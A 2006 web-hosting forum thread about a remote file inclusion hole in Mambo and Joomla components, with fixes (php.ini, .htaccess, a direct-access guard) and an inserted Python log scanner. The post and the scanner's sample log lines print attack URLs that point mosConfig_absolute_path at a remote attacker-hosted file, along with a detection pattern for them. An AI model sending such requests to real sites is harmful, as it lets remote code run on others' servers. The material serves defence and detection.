Web Hosting Forum | Lunarpages


Topic: Mambo and Joomla Vulnerabilities
Danielle
Guest
« on: July 18, 2006, 05:57:09 AM »

Hi,

Currently, there is a high vulnerability risk for addon components to Mambo and Joomla due to our servers having register_globals set to ON in the global php.ini. This is being exploited to run the following type of url string to upload malicious files onto an account:

Code:
GET /components/com_somecomponent/componentfile.php?mosConfig_absolute_path=http://somesite.com/somemaliciousfile.txt

Where somecomponent is the component such as com_smf or com_extcalendar and componentfile.php is the file like smf.php or extcalendar.php (these are just examples, many Mambo and Joomla addon components have this security hole), and where somesite.com is any site where the hacker has his crummy file and somemaliciousfile.txt is that file.

The manner to fix this issue is the following:

1. Create a php.ini on the account at /home/user/public_html (user here indicates your cPanel username).  You can reach this location if you log into cPanel, click on File Manager, then click on the folder icon next to the public_html folder.  Inside public_html, simply click the "Create File" link, then in the upper right, name the file php.ini.  Check that the file doesn't already exist in public_html.  If it does exist, simply add the 2 lines in Step #2 to that file.

2. In the php.ini file put:

Code:
register_globals = Off
allow_url_fopen = Off

3. In the public_html folder, open the .htaccess file by clicking on the file's name in File Manager and selecting "Edit File" in the upper right hand corner list of links, then add this (change user to your cPanel username in the /home/user/public_html path):

Code:
suPHP_ConfigPath /home/user/public_html
<Files php.ini>
order allow,deny
deny from all
</Files>

4. In the exploited or exploitable file in question (/home/user/public_html/mambolocation/components/com_somecomponent/componentfile.php), add this:

Code:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

Put that at the top right after the opening php tag (<?php or <?).

These should ensure the component is not exploitable. 

I hope this helps.

Edit: There are 2 very helpful threads on Joomla's forum about security for Joomla (Mambo would be able to benefit from the same discussion as these will also help to protect it more):

http://forum.joomla.org/index.php/topic,75376.0.html
http://forum.joomla.org/index.php/topic,76578.0.html
« Last Edit: July 20, 2006, 11:24:28 PM by Danielle » Logged
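As an added example that is not part of this thread, here is a Python script a server admin could run over Apache combined-format access logs to spot the request pattern described above (a Mambo/Joomla component file called with a mosConfig_absolute_path parameter that points at a remote URL). The log lines are constructed samples; mosConfig_live_site is a further Mambo/Joomla configuration global that the post does not mention.

```python
"""Flag register_globals remote-file-inclusion attempts against Mambo/Joomla components."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Configuration globals that vulnerable components read from the request when
# register_globals is on. Compared case-insensitively.
RISKY_PARAMS = {"mosconfig_absolute_path", "mosconfig_live_site"}

# Constructed sample lines: two attempts (one with a URL-encoded scheme) and one normal request.
SAMPLE_LOG = [
    '203.0.113.9 - - [18/Jul/2006:05:57:09 +0000] "GET /components/com_extcalendar/extcalendar.php'
    '?mosConfig_absolute_path=http://example.net/x.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [18/Jul/2006:05:58:01 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 8013',
    '203.0.113.9 - - [18/Jul/2006:05:59:30 +0000] "GET /site/components/com_smf/smf.php'
    '?mosConfig_absolute_path=ftp%3A%2F%2Fexample.net%2Fx.txt HTTP/1.1" 200 512',
]


def is_rfi_attempt(request_path):
    """True if a component script is called with a config path pointing at a remote URL."""
    parts = urlsplit(request_path)
    if "/components/com_" not in parts.path:
        return False
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes %3A%2F%2F etc.
    for name, values in query.items():
        if name.lower() in RISKY_PARAMS:
            if any(re.match(r"^(https?|ftp)://", v, re.IGNORECASE) for v in values):
                return True
    return False


def scan_log(lines):
    """Return (client ip, request path) for every line that looks like an RFI attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m.group("path")):
            hits.append((m.group("ip"), m.group("path")))
    return hits


if __name__ == "__main__":
    for ip, path in scan_log(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: {path}")
```

A local value such as mosConfig_absolute_path=/home/user/public_html is not flagged, so the script only reports the remote-include variant the post describes.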
JamesG
« Reply #1 on: September 21, 2006, 02:00:13 AM »

thanks :), worked perfectly and got rid of the annoying error in my admin area :)